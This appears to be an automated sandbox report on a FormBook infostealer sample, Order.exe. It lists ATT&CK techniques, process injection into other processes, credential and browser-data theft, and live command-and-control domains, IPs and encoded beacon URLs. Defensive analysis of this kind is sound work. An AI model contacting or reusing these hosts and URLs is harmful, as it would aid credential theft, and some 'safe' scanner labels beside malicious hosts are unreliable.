                Source: Yara match | File source: 00000009.00000002.1784067964.0000000003230000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000B.00000002.3128071323.0000000003700000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                MITRE ATT&CK Matrix (one row per matrix line; a leading number is the report's count of matched signatures for that technique):

                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 312 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 1 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 312 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 113 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 4 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 12 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Timestomp | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 1 DLL Side-Loading | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
                [Behavior Graph ID: 1554471 | Sample: Order.exe | Startdate: 12/11/2024 | Architecture: WINDOWS | Score: 100]
                Start: contacts www.tesetturhanzade.xyz, zz67x.top and 13 other IPs or domains; signatures: Suricata IDS alerts for network traffic, Multi AV Scanner detection for submitted file, Yara detected FormBook, 5 other signatures; www.tesetturhanzade.xyz: Performs DNS queries to domains with low reputation -> starts Order.exe
                Order.exe: dropped C:\Users\user\AppData\Local\...\Order.exe.log (ASCII); Injects a PE file into a foreign processes -> starts Order.exe (child)
                Order.exe (child): Maps a DLL or memory area into another process -> injects into lOYqgVWsbtwCn.exe
                lOYqgVWsbtwCn.exe: ultrawin23.shop 170.39.213.43 (ports 49985, 49986, 49987; PETRONAS-BHD-AS-APPetroliamNasionalBerhadMY, Reserved); www.deeplungatlas.org 194.9.94.85 (ports 49981, 49982, 49983; LOOPIASE, Sweden); 6 other IPs or domains; Found direct / indirect Syscall (likely to bypass EDR) -> starts fc.exe
                fc.exe: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 2 other signatures -> starts firefox.exe

                Source | Detection | Scanner | Label | Link
                Order.exe | 24% | ReversingLabs | Win32.Trojan.Generic |
                Order.exe | 100% | Joe Sandbox ML | |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://www.zz67x.top/45n6/?ZX=G2OXK&ZtwlQ=djThxhCXsVTaW29IStONWe6xHREL7sfT17x4FrONtsEdvh3lUnzIZnalbCLaN+V127dkaLgcrePaRgDcNiYyv3h68wNOsFyKAz31clbs/jf4McL8QfrvpP2aRWMeaeVzG2yiHAO/Jkyn0%Avira URL Cloudsafe
                https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park0%Avira URL Cloudsafe
                http://www.vibixx.site/4xim/?ZX=G2OXK&ZtwlQ=0a8PLTuVJQjPSrlSWcuFsyjhCtT3tUYocqBNWW0rXtqiQhjiqFhrPTN8PV80cHIUHvAO/w81MYBbJGISUqP20/OCD6R2GxJg22BCsIc2mVLkjoCYHOMomb5GKySOlS/QA9Ktb+YS58Qw0%Avira URL Cloudsafe
                http://www.omnibizlux.biz/jlqg/?ZtwlQ=8ZwuH3XLrsgkZOwseHvalCxaOoZWL8Myt6ETjGRYvhbDeONq4p5sIs5njeSldqxqKZPhhBSXVHEE53Bztq1stpe7mm3wauuEAY4FKC8z+iht6Qhedx9FkGs7kW/sJA05D+zdwUDUvmBi&ZX=G2OXK0%Avira URL Cloudsafe
                http://www.vibixx.site/4xim/0%Avira URL Cloudsafe
                http://www.omnibizlux.biz/jlqg/0%Avira URL Cloudsafe
                http://www.ultrawin23.shop/53y2/?ZtwlQ=t/JS3aCWZhQCYNrXnvgf+Spfn+QwkJd9+ukIZkrf2wKhs0ak4EV/sNuml9GQ/gRnrRAuSs9LfWphueMxgO6ylAR+OjeKP5reZGyzx4OrXvFvuqWHYyr9YQxhjYSLaT0UH6C6o1S+flVa&ZX=G2OXK0%Avira URL Cloudsafe
                http://www.tesetturhanzade.xyz/ur0f/?ZtwlQ=zogJdywBU1O1LleNfuKvTdvFae130slE6VGlZ0lHVZSYlVhh6xxrlMSZfTqXcXU1qXLRjwj9DFcRyKew14ZiEqz+1EU/fdPUgaJ8uSCdsp0ZpxD49H6BZny0S7BKl2GeJmA+Pu+eIAwF&ZX=G2OXK0%Avira URL Cloudsafe
                http://www.deeplungatlas.org/57zf/0%Avira URL Cloudsafe
                https://static.loopia.se/responsive/images/iOS-114.png0%Avira URL Cloudsafe
                https://static.loopia.se/responsive/images/iOS-72.png0%Avira URL Cloudsafe
                http://www.zz67x.top/45n6/0%Avira URL Cloudsafe
                http://www.kantinestoel.online/ggvc/?ZX=G2OXK&ZtwlQ=8JknlPcTs2UijknPxbO2oXM1DVs+MaDJyzfKPy/xZKvt3f8uoA3Cr57APZQOM8ic8BRlU5XE22T0HXZ7ivS1mrWVaOoSFtg0ZSHozP3aZjl6eIHnZqLtTRSsN9Et6GBTXH3WSnBcOkE90%Avira URL Cloudsafe
                http://www.sonoscan.org/ew98/0%Avira URL Cloudsafe
                https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking0%Avira URL Cloudsafe
                http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut0%Avira URL Cloudsafe
                https://static.loopia.se/responsive/styles/reset.css0%Avira URL Cloudsafe
                http://www.ultrawin23.shop/53y2/0%Avira URL Cloudsafe
                http://www.sonoscan.org/ew98/?ZtwlQ=DRp8qVXu3DttXwSjdKhWcEeMlFq8C+hogWxSvfZ4d/ir/4GJO1kBPGKjrfOH+I9HTBbwMxIq6OZmA+t0U8cpswvjbO8lhQySl36enx/adUbxmSmc4lJew7Tc5qfeDwhytdyu/8fbB0k7&ZX=G2OXK0%Avira URL Cloudsafe
                https://static.loopia.se/responsive/images/iOS-57.png0%Avira URL Cloudsafe
                http://www.deeplungatlas.org/57zf/?ZtwlQ=RSXDvmZ18TUSGahlBulUTEWs/Fcq4D9Pe8zesMLeYybHc+55raQPDCyvNJ+XALungzCzmhokbhdOc6Bo/lmiwp/JS/jJT11lfoMCLi5cvamonTeSDCRL83RdCYlcDH7pRdqC9V4SuntT&ZX=G2OXK0%Avira URL Cloudsafe
                https://static.loopia.se/shared/logo/logo-loopia-white.svg0%Avira URL Cloudsafe
                https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe0%Avira URL Cloudsafe
                https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw0%Avira URL Cloudsafe
                http://www.vibixx.site0%Avira URL Cloudsafe
                https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa0%Avira URL Cloudsafe
                https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park0%Avira URL Cloudsafe
                http://www.kantinestoel.online/ggvc/0%Avira URL Cloudsafe
                https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa0%Avira URL Cloudsafe
                https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin0%Avira URL Cloudsafe
                https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa0%Avira URL Cloudsafe
                https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb0%Avira URL Cloudsafe
                https://static.loopia.se/shared/images/additional-pages-hero-shape.webp0%Avira URL Cloudsafe
                https://www.ultrawin23.shop/53y2/?ZtwlQ=t/JS3aCWZhQCYNrXnvgf0%Avira URL Cloudsafe
                https://static.loopia.se/shared/style/2022-extra-pages.css0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                www.vibixx.site
                162.0.211.143
                truetrue
                  unknown
                  zz67x.top
                  38.47.232.194
                  truetrue
                    unknown
                    www.sonoscan.org
                    13.248.169.48
                    truetrue
                      unknown
                      www.deeplungatlas.org
                      194.9.94.85
                      truetrue
                        unknown
                        ultrawin23.shop
                        170.39.213.43
                        truetrue
                          unknown
                          natroredirect.natrocdn.com
                          85.159.66.93
                          truefalse
                            high
                            kantinestoel.online
                            91.184.0.200
                            truetrue
                              unknown
                              www.omnibizlux.biz
                              167.172.133.32
                              truefalse
                                high
                                www.ultrawin23.shop
                                unknown
                                unknownfalse
                                  unknown
                                  www.zz67x.top
                                  unknown
                                  unknownfalse
                                    unknown
                                    www.tangible.online
                                    unknown
                                    unknownfalse
                                      unknown
                                      www.tesetturhanzade.xyz
                                      unknown
                                      unknowntrue
                                        unknown
                                        www.rka6460.online
                                        unknown
                                        unknownfalse
                                          unknown
                                          www.kantinestoel.online
                                          unknown
                                          unknownfalse
                                            unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.vibixx.site/4xim/?ZX=G2OXK&ZtwlQ=0a8PLTuVJQjPSrlSWcuFsyjhCtT3tUYocqBNWW0rXtqiQhjiqFhrPTN8PV80cHIUHvAO/w81MYBbJGISUqP20/OCD6R2GxJg22BCsIc2mVLkjoCYHOMomb5GKySOlS/QA9Ktb+YS58Qw | true | Avira URL Cloud: safe | unknown
http://www.ultrawin23.shop/53y2/?ZtwlQ=t/JS3aCWZhQCYNrXnvgf+Spfn+QwkJd9+ukIZkrf2wKhs0ak4EV/sNuml9GQ/gRnrRAuSs9LfWphueMxgO6ylAR+OjeKP5reZGyzx4OrXvFvuqWHYyr9YQxhjYSLaT0UH6C6o1S+flVa&ZX=G2OXK | true | Avira URL Cloud: safe | unknown
http://www.deeplungatlas.org/57zf/ | true | Avira URL Cloud: safe | unknown
http://www.zz67x.top/45n6/?ZX=G2OXK&ZtwlQ=djThxhCXsVTaW29IStONWe6xHREL7sfT17x4FrONtsEdvh3lUnzIZnalbCLaN+V127dkaLgcrePaRgDcNiYyv3h68wNOsFyKAz31clbs/jf4McL8QfrvpP2aRWMeaeVzG2yiHAO/Jkyn | true | Avira URL Cloud: safe | unknown
http://www.omnibizlux.biz/jlqg/?ZtwlQ=8ZwuH3XLrsgkZOwseHvalCxaOoZWL8Myt6ETjGRYvhbDeONq4p5sIs5njeSldqxqKZPhhBSXVHEE53Bztq1stpe7mm3wauuEAY4FKC8z+iht6Qhedx9FkGs7kW/sJA05D+zdwUDUvmBi&ZX=G2OXK | true | Avira URL Cloud: safe | unknown
http://www.vibixx.site/4xim/ | true | Avira URL Cloud: safe | unknown
http://www.omnibizlux.biz/jlqg/ | true | Avira URL Cloud: safe | unknown
http://www.tesetturhanzade.xyz/ur0f/?ZtwlQ=zogJdywBU1O1LleNfuKvTdvFae130slE6VGlZ0lHVZSYlVhh6xxrlMSZfTqXcXU1qXLRjwj9DFcRyKew14ZiEqz+1EU/fdPUgaJ8uSCdsp0ZpxD49H6BZny0S7BKl2GeJmA+Pu+eIAwF&ZX=G2OXK | true | Avira URL Cloud: safe | unknown
http://www.zz67x.top/45n6/ | true | Avira URL Cloud: safe | unknown
http://www.kantinestoel.online/ggvc/?ZX=G2OXK&ZtwlQ=8JknlPcTs2UijknPxbO2oXM1DVs+MaDJyzfKPy/xZKvt3f8uoA3Cr57APZQOM8ic8BRlU5XE22T0HXZ7ivS1mrWVaOoSFtg0ZSHozP3aZjl6eIHnZqLtTRSsN9Et6GBTXH3WSnBcOkE9 | true | Avira URL Cloud: safe | unknown
http://www.sonoscan.org/ew98/ | true | Avira URL Cloud: safe | unknown
http://www.ultrawin23.shop/53y2/ | true | Avira URL Cloud: safe | unknown
http://www.sonoscan.org/ew98/?ZtwlQ=DRp8qVXu3DttXwSjdKhWcEeMlFq8C+hogWxSvfZ4d/ir/4GJO1kBPGKjrfOH+I9HTBbwMxIq6OZmA+t0U8cpswvjbO8lhQySl36enx/adUbxmSmc4lJew7Tc5qfeDwhytdyu/8fbB0k7&ZX=G2OXK | true | Avira URL Cloud: safe | unknown
http://www.deeplungatlas.org/57zf/?ZtwlQ=RSXDvmZ18TUSGahlBulUTEWs/Fcq4D9Pe8zesMLeYybHc+55raQPDCyvNJ+XALungzCzmhokbhdOc6Bo/lmiwp/JS/jJT11lfoMCLi5cvamonTeSDCRL83RdCYlcDH7pRdqC9V4SuntT&ZX=G2OXK | true | Avira URL Cloud: safe | unknown
http://www.kantinestoel.online/ggvc/ | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | fc.exe, 0000000C.00000003.2028971511.00000000083D8000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | fc.exe, 0000000C.00000003.2028971511.00000000083D8000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://static.loopia.se/responsive/images/iOS-114.png | lOYqgVWsbtwCn.exe, 0000000B.00000002.3136990713.000000000619A000.00000004.80000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3128369382.000000000487A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3131355528.00000000068E0000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | fc.exe, 0000000C.00000003.2028971511.00000000083D8000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park | lOYqgVWsbtwCn.exe, 0000000B.00000002.3136990713.000000000619A000.00000004.80000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3128369382.000000000487A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3131355528.00000000068E0000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | fc.exe, 0000000C.00000003.2028971511.00000000083D8000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | fc.exe, 0000000C.00000003.2028971511.00000000083D8000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://static.loopia.se/responsive/images/iOS-72.png | lOYqgVWsbtwCn.exe, 0000000B.00000002.3136990713.000000000619A000.00000004.80000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3128369382.000000000487A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3131355528.00000000068E0000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut | lOYqgVWsbtwCn.exe, 0000000B.00000002.3136990713.000000000619A000.00000004.80000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3128369382.000000000487A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3131355528.00000000068E0000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.ecosia.org/newtab/ | fc.exe, 0000000C.00000003.2028971511.00000000083D8000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking | lOYqgVWsbtwCn.exe, 0000000B.00000002.3136990713.000000000619A000.00000004.80000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3128369382.000000000487A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3131355528.00000000068E0000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://static.loopia.se/responsive/styles/reset.css | lOYqgVWsbtwCn.exe, 0000000B.00000002.3136990713.000000000619A000.00000004.80000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3128369382.000000000487A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3131355528.00000000068E0000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ac.ecosia.org/autocomplete?q= | fc.exe, 0000000C.00000003.2028971511.00000000083D8000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://static.loopia.se/responsive/images/iOS-57.png | lOYqgVWsbtwCn.exe, 0000000B.00000002.3136990713.000000000619A000.00000004.80000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3128369382.000000000487A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3131355528.00000000068E0000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://static.loopia.se/shared/logo/logo-loopia-white.svg | lOYqgVWsbtwCn.exe, 0000000B.00000002.3136990713.000000000619A000.00000004.80000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3128369382.000000000487A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3131355528.00000000068E0000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe | lOYqgVWsbtwCn.exe, 0000000B.00000002.3136990713.000000000619A000.00000004.80000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3128369382.000000000487A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3131355528.00000000068E0000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw | lOYqgVWsbtwCn.exe, 0000000B.00000002.3136990713.000000000619A000.00000004.80000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3128369382.000000000487A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3131355528.00000000068E0000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.vibixx.site | lOYqgVWsbtwCn.exe, 0000000B.00000002.3126216814.0000000000A82000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | fc.exe, 0000000C.00000003.2028971511.00000000083D8000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park | lOYqgVWsbtwCn.exe, 0000000B.00000002.3136990713.000000000619A000.00000004.80000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3128369382.000000000487A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3131355528.00000000068E0000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa | lOYqgVWsbtwCn.exe, 0000000B.00000002.3136990713.000000000619A000.00000004.80000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3128369382.000000000487A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3131355528.00000000068E0000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa | lOYqgVWsbtwCn.exe, 0000000B.00000002.3136990713.000000000619A000.00000004.80000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3128369382.000000000487A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3131355528.00000000068E0000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin | lOYqgVWsbtwCn.exe, 0000000B.00000002.3136990713.000000000619A000.00000004.80000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3128369382.000000000487A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3131355528.00000000068E0000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | fc.exe, 0000000C.00000003.2028971511.00000000083D8000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa | lOYqgVWsbtwCn.exe, 0000000B.00000002.3136990713.000000000619A000.00000004.80000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3128369382.000000000487A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3131355528.00000000068E0000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb | lOYqgVWsbtwCn.exe, 0000000B.00000002.3136990713.000000000619A000.00000004.80000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3128369382.000000000487A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3131355528.00000000068E0000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://static.loopia.se/shared/images/additional-pages-hero-shape.webp | lOYqgVWsbtwCn.exe, 0000000B.00000002.3136990713.000000000619A000.00000004.80000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3128369382.000000000487A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3131355528.00000000068E0000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.ultrawin23.shop/53y2/?ZtwlQ=t/JS3aCWZhQCYNrXnvgf | lOYqgVWsbtwCn.exe, 0000000B.00000002.3136990713.000000000632C000.00000004.80000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3128369382.0000000004A0C000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://static.loopia.se/shared/style/2022-extra-pages.css | lOYqgVWsbtwCn.exe, 0000000B.00000002.3136990713.000000000619A000.00000004.80000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3128369382.000000000487A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3131355528.00000000068E0000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
13.248.169.48 | www.sonoscan.org | United States | 16509 | AMAZON-02US | true
91.184.0.200 | kantinestoel.online | Netherlands | 197902 | HOSTNETNL | true
194.9.94.85 | www.deeplungatlas.org | Sweden | 39570 | LOOPIASE | true
167.172.133.32 | www.omnibizlux.biz | United States | 14061 | DIGITALOCEAN-ASNUS | false
38.47.232.194 | zz67x.top | United States | 174 | COGENT-174US | true
162.0.211.143 | www.vibixx.site | Canada | 35893 | ACPCA | true
85.159.66.93 | natroredirect.natrocdn.com | Turkey | 34619 | CIZGITR | false
170.39.213.43 | ultrawin23.shop | Reserved | 139776 | PETRONAS-BHD-AS-APPetroliamNasionalBerhadMY | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1554471
Start date and time: 2024-11-12 15:28:50 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 37s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of new started processes analysed: 18
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Order.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/2@11/8
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 93%
• Number of executed functions: 114
• Number of non-executed functions: 295
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded the maximum time and may be missing disassembly code information
• VT rate limit hit for: Order.exe
Time | Type | Description
11:28:55 | API Interceptor | 4502414x Sleep call for process: fc.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
13.248.169.48 | Arrival Notice.exe | malicious | FormBook | www.ipk.app/phav/
13.248.169.48 | RN# D7521-RN-00353 REV-2.exe | malicious | FormBook | www.hopeisa.live/v0jl/
13.248.169.48 | 8dPlV2lT8o.exe | malicious | Simda Stealer | pupydeq.com/login.php
13.248.169.48 | 7ObLFE2iMK.exe | malicious | Simda Stealer | pupydeq.com/login.php
13.248.169.48 | UMwpXhA46R.exe | malicious | Simda Stealer | pupydeq.com/login.php
13.248.169.48 | 1fWgBXPgiT.exe | malicious | Simda Stealer | pupydeq.com/login.php
13.248.169.48 | arxtPs1STE.exe | malicious | Simda Stealer | pupydeq.com/login.php
13.248.169.48 | Z8eHwAvqAh.exe | malicious | Simda Stealer | pupydeq.com/login.php
13.248.169.48 | WlCVLbzNph.exe | malicious | Simda Stealer | pupydeq.com/login.php
13.248.169.48 | Bpfz752pYZ.exe | malicious | Simda Stealer | pupydeq.com/login.php
91.184.0.200 | Arrival Notice.exe | malicious | FormBook | www.wethebeststore.online/znb6/
91.184.0.200 | SDBARVe3d3.exe | malicious | FormBook | www.kantinestoel.online/ggvc/
91.184.0.200 | rDRAWINGDWGSINC.exe | malicious | FormBook | www.aquaria.lease/xoeu/
91.184.0.200 | fJD7ivEnzm.exe | malicious | FormBook | www.jobworklanka.online/ikh0/
91.184.0.200 | jpdy1E8K4A.exe | malicious | FormBook | www.jobworklanka.online/ikh0/
91.184.0.200 | CITA#U00c7#U00c3O.exe | malicious | FormBook | www.jobworklanka.online/ikh0/
91.184.0.200 | CYTAT.exe | malicious | FormBook | www.jobworklanka.online/ikh0/
91.184.0.200 | Cotizaci#U00f3n.exe | malicious | FormBook | www.jobworklanka.online/ikh0/
91.184.0.200 | PAGO $830.900.exe | malicious | FormBook | www.jobworklanka.online/ikh0/
91.184.0.200 | FATURALAR PDF.exe | malicious | FormBook | www.jobworklanka.online/hxxx/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.sonoscan.org | New PO [FK4-7173].pdf.exe | malicious | FormBook | 13.248.169.48
www.sonoscan.org | SDBARVe3d3.exe | malicious | FormBook | 13.248.169.48
www.sonoscan.org | A4mmSHCUi2.exe | malicious | FormBook | 13.248.169.48
www.omnibizlux.biz | New PO [FK4-7173].pdf.exe | malicious | FormBook | 167.172.133.32
www.omnibizlux.biz | ByuoedHi2e.exe | malicious | FormBook | 167.172.133.32
www.omnibizlux.biz | SDBARVe3d3.exe | malicious | FormBook | 167.172.133.32
www.omnibizlux.biz | Ponta Saheb. PO 4400049817.exe | malicious | FormBook | 167.172.133.32
www.omnibizlux.biz | P1 BOL.exe | malicious | Unknown | 167.172.133.32
